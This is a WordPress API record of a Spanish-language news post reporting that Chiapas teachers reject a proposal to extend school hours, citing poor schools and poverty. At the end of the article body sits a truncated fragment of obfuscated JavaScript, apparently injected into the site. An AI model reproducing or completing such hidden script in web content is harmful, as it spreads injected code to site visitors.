{"id":3663,"date":"2022-07-18T01:28:07","date_gmt":"2022-07-18T01:28:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3663"},"modified":"2022-07-18T01:28:08","modified_gmt":"2022-07-18T01:28:08","slug":"maestros-rechazan-propuesta-de-extender-horarios-de-clases-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3663","title":{"rendered":"Maestros rechazan propuesta de extender horarios de clases en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"479\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658107568649.jpg\" alt=\"\" class=\"wp-image-3664\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658107568649.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1658107568649-300x187.jpg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Rodolfo FloresAgencia ReporteCiudadano, 17 de julio del 2022. Tuxtla Guti\u00e9rrez.- Integrantes de la Asamblea Estatal Democr\u00e1tica, aseguran que la propuesta de las autoridades de extender el horario de clases, se debe a que no conocen los centros de trabajo del magisterio,  ni mucho menos las condiciones deplorables en las que se encuentran las escuelas en todos los niveles. El secretario de la AED Armando Falconi Borraz  expuso que las siete l\u00edneas de aprendizaje que plantea la SEP, ya se practican en las escuelas, como los huertos, las lenguas ind\u00edgenas, artes, danza, m\u00fasica, elaboraci\u00f3n de artesan\u00edas, sin embargo, lo que m\u00e1s afecta es el recorte que hicieron al programa de desayunos escolares, ya que la mayor\u00eda, un 70 por ciento del alumnado en Chiapas, vive en extrema pobreza.Lament\u00f3 que se hable de horarios de hasta ocho horas, cuando las familias chiapanecas acostumbrar a llevar a sus hijos al campo, y alargar estos horarios afectar\u00eda sus actividades, adem\u00e1s, los infantes de preescolar, no soportar\u00edan ocho horas en las aulas, especialmente en aquellas zonas con muy altas temperaturas y no cuentan ni con agua o ventilador.Lament\u00f3 que: \u201cNo hay escuelas dignas, no hay aulas dignas, sanitarios dignos, letrinas, escuelas con piso de tierra, l\u00e1mina, de madera, y no vemos, y ya estamos a cuatro a\u00f1os de la cuarta transformaci\u00f3n\u201d.Cabe recordar que, el horario extendido se propuso en las escuelas p\u00fablicas de educaci\u00f3n preescolar, primaria y secundaria, con el fin de enriquecer la integraci\u00f3n entre alumnado y magisterio, con siete l\u00edneas de aprendizaje que son: lectura, escritura, uso de lenguas ind\u00edgenas, juegos con n\u00fameros, arte, cultura de la paz, tecnolog\u00eda y vida saludable.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo FloresAgencia ReporteCiudadano, 17 de julio del 2022. Tuxtla Guti\u00e9rrez.- Integrantes de la Asamblea Estatal Democr\u00e1tica, aseguran que la propuesta de las autoridades de extender el horario de clases, se debe a que no conocen los centros de trabajo del magisterio, ni mucho menos las condiciones deplorables en las que se encuentran las escuelas en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3664,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3663","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3663","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3663"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3663\/revisions"}],"predecessor-version":[{"id":3665,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3663\/revisions\/3665"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3664"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}